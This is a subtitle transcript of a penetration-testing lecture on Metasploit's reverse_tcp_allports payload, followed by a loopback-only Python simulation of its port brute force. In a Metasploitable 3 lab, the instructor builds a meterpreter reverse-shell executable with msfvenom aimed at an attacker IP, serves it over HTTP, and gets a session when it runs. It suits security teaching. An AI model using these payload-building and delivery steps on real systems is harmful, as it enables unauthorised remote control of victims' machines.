1
00:00:00,390 --> 00:00:06,450
All right, so there are two popular types of shells, bind and reverse.

2
00:00:07,700 --> 00:00:12,050
The usage of them depends on the situation that you're in, in the network.

3
00:00:13,000 --> 00:00:19,660
A bind shell opens up a new service on the target, and it requires you to connect to this service to

4
00:00:19,660 --> 00:00:20,320
get a session.

5
00:00:21,800 --> 00:00:25,760
But on the other hand, it's going to be different for a reverse shell.

6
00:00:27,060 --> 00:00:35,370
When you're using a reverse shell, you first need to open a service on your host to listen for incoming

7
00:00:35,370 --> 00:00:36,690
probes from the target.

8
00:00:38,250 --> 00:00:40,920
Then the target connects back to your host.

9
00:00:42,210 --> 00:00:49,020
So in a penetration test, you will mostly need to be using reverse because of these reasons and more.

10
00:00:50,290 --> 00:00:53,980
So I'll make it clearer with another example.

11
00:00:54,960 --> 00:01:03,120
For instance, you and a target may be in different private networks, or a firewall of the target may

12
00:01:03,120 --> 00:01:04,770
block your connection attempts.

13
00:01:05,670 --> 00:01:10,800
What do you do? And it's not just limited to these examples, but

14
00:01:11,900 --> 00:01:18,740
even when you decide to use a reverse shell, due to some egress firewall rules, the target may not

15
00:01:18,740 --> 00:01:20,120
allow you to get a session.

16
00:01:21,070 --> 00:01:28,480
And that's when you will try to create a reverse shell over some known port that's more typically allowed,

17
00:01:28,480 --> 00:01:33,190
such as 443, 80, 8080 and so on.

18
00:01:34,590 --> 00:01:43,320
So when you create the payload, you only provide one port, so you know what, it's not an efficient

19
00:01:43,320 --> 00:01:49,200
way because it kind of makes you try new payloads with a new port on every attempt.
20
00:01:51,140 --> 00:01:59,250
But to avoid this, MSF has another payload type, which is reverse_tcp_allports.

21
00:01:59,630 --> 00:02:01,480
You're wondering where I was coming from, huh?

22
00:02:02,690 --> 00:02:07,790
So the reverse_tcp payload only allows connection to one port.

23
00:02:09,010 --> 00:02:19,540
But reverse_tcp_allports is used to brute force all the ports from 1 to 65535.

24
00:02:20,600 --> 00:02:27,860
So one thing to keep in mind: going through the entire port range from 1 to 65535 can take a very

25
00:02:27,860 --> 00:02:28,420
long time.

26
00:02:29,300 --> 00:02:31,130
So think twice before you use it.

27
00:02:31,940 --> 00:02:32,630
You know me.

28
00:02:33,560 --> 00:02:35,780
I'll see an example on Metasploitable 3.

29
00:02:37,290 --> 00:02:44,100
So open up your terminal and start Metasploit, then search the term "allports" in payloads.

30
00:02:48,420 --> 00:02:51,810
And here are the modules related to the term allports.

31
00:02:53,220 --> 00:02:58,920
And you can probably see the allports version of some of the payloads that we've been using in the previous

32
00:02:58,920 --> 00:02:59,400
lectures.

33
00:03:00,610 --> 00:03:03,250
You can also display the information of this module.

34
00:03:05,970 --> 00:03:10,530
So let's look at the description of the LPORT variable.

35
00:03:11,690 --> 00:03:14,030
So it starts on port 1.

36
00:03:15,140 --> 00:03:17,660
So this means you can set a start value.

37
00:03:18,910 --> 00:03:23,530
So before creating a file with that payload, I'm going to start a handler for that.

38
00:03:24,760 --> 00:03:29,320
To do that we'll use exploit/multi/handler as our template.

39
00:03:31,410 --> 00:03:35,340
Set payload to windows/meterpreter/

40
00:03:36,660 --> 00:03:39,210
reverse_tcp_allports.

41
00:03:41,750 --> 00:03:45,020
Set LHOST to Kali's IP address.

42
00:03:46,180 --> 00:03:47,830
And show me the options.
43
00:03:49,850 --> 00:03:52:490
So I won't set the LPORT value.

44
00:03:54,520 --> 00:04:01,990
OK, I'll now open another window to create that exe file with the reverse allports payload.

45
00:04:03,450 --> 00:04:06,270
And we'll use msfvenom for this.

46
00:04:07,300 --> 00:04:08,320
-p windows/

47
00:04:10,110 --> 00:04:11,010
meterpreter/

48
00:04:12,090 --> 00:04:21,300
reverse_tcp_allports LHOST=10.10.2.11

49
00:04:22,340 --> 00:04:25,220
I'm not going to set LPORT here either.

50
00:04:26,650 --> 00:04:29,770
Set file format to exe.

51
00:04:30,960 --> 00:04:32,550
And set platform to Windows.

52
00:04:34,800 --> 00:04:37,410
So finally, let's give a name to the output file.

53
00:04:39,520 --> 00:04:41,120
allports.exe

54
00:04:43,200 --> 00:04:44,750
Now I'll go to another tab.

55
00:04:46,130 --> 00:04:48,700
And start the exploit in the background.

56
00:04:50,430 --> 00:04:52,800
"jobs" to list the background job.

57
00:04:53,710 --> 00:04:55,900
And here's the job that I've currently created.

58
00:04:57,170 --> 00:05:01,580
Now, there's no session as well, so let's go to another tab.

59
00:05:02,590 --> 00:05:11,230
Now, I'm going to start a Python web server here to be able to download allports.exe from that Metasploitable

60
00:05:11,230 --> 00:05:11,590
3.

61
00:05:13,030 --> 00:05:19,330
And Metasploitable 3 is on my second screen, so I'm going to try to bring that screen over.

62
00:05:20,710 --> 00:05:25,150
And now I will open Internet Explorer.

63
00:05:26,430 --> 00:05:28,500
Hmm, I wonder if these warnings are going to let me.

64
00:05:29,780 --> 00:05:38,330
So let's go to http://10.10.2.11:8080.

65
00:05:39,630 --> 00:05:46,440
And look at that, as soon as I connect to Kali, the messages show up on the screen.

66
00:05:47,830 --> 00:05:51,760
So now let's click and download the allports file.
67
00:05:53,310 --> 00:05:55,430
I'll save that file to the desktop.

68
00:06:01,470 --> 00:06:08,700
And as soon as I click on the file in my Metasploitable 3, a session opened in the msfconsole.

69
00:06:09,770 --> 00:06:11,070
Let's look at the connected port.

70
00:06:11,840 --> 00:06:12,830
It is 1.

71
00:06:13,990 --> 00:06:16,510
And here are all the sessions.
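The lecture above describes what reverse_tcp_allports does (the target tries to connect back on one port after another, starting at LPORT, until one gets through) but never shows the mechanism itself. The following is an added simulation written for this page; it is not Metasploit's stager or handler code. It assumes a made-up two-message handshake ("port=N" from the target, "handler-ok" from the listener) purely so the listener can learn which port succeeded, and it runs entirely on the loopback interface: the handler listens on a single OS-chosen port, which plays the role of the one egress port a firewall happens to allow, and the connect-back loop starts a configurable number of ports below it so the run finishes quickly.

```python
import socket
import threading

HANDSHAKE_OK = b"handler-ok"  # assumed reply token, not part of any real payload


def start_handler(host="127.0.0.1"):
    """Listener side: open exactly one port and accept a single connect-back.

    Returns (port, result_dict, thread). The result dict is filled in by the
    accept thread once a client has reported which port it reached us on.
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, 0))  # port 0: let the OS pick a free port for the demo
    srv.listen(1)
    result = {}

    def accept_once():
        conn, _ = srv.accept()
        with conn:
            banner = conn.recv(64).decode(errors="replace")  # e.g. "port=45127"
            result["reported_port"] = int(banner.split("=", 1)[1])
            conn.sendall(HANDSHAKE_OK)
        srv.close()

    t = threading.Thread(target=accept_once, daemon=True)
    t.start()
    return srv.getsockname()[1], result, t


def connect_back_allports(host, start_port, end_port=65535, timeout=0.2):
    """Target side: the brute-force loop an allports-style stager performs.

    Tries every port from start_port to end_port in order. A refused or
    timed-out connect moves on to the next port; a connect that succeeds but
    does not answer with HANDSHAKE_OK (some unrelated service) is also skipped.
    Returns (port_that_worked, attempts) or (None, attempts).
    """
    attempts = 0
    for port in range(start_port, end_port + 1):
        attempts += 1
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(timeout)  # a filtered port costs a full timeout, a refused one almost nothing
        try:
            s.connect((host, port))
            s.sendall(f"port={port}".encode())
            reply = s.recv(64)
        except OSError:
            continue
        finally:
            s.close()
        if reply == HANDSHAKE_OK:
            return port, attempts
    return None, attempts


def demo(ports_before_listener=200):
    """Run both sides on loopback and report what happened."""
    listener_port, result, t = start_handler()
    start_port = max(1, listener_port - ports_before_listener)
    port, attempts = connect_back_allports("127.0.0.1", start_port, end_port=listener_port)
    t.join(timeout=5)
    return {
        "listener_port": listener_port,
        "start_port": start_port,
        "connected_port": port,
        "attempts": attempts,
        "reported_port": result.get("reported_port"),
    }


if __name__ == "__main__":
    r = demo()
    print(f"listener on {r['listener_port']}, scanned from {r['start_port']}: "
          f"connected on {r['connected_port']} after {r['attempts']} attempts")
```

Two things the simulation makes concrete. First, the cost the lecture warns about comes from filtered ports, not refused ones: on loopback every closed port answers with an immediate reset, but a firewall that silently drops packets makes each port cost the full timeout, and 65535 ports at 0.2 s each is roughly 3.6 hours before the target even reaches a port that might be open, which is why the start value (LPORT) matters. Second, only one port is ever open on the listener side; getting every other port's traffic to reach it is a separate piece of network plumbing that this example leaves out.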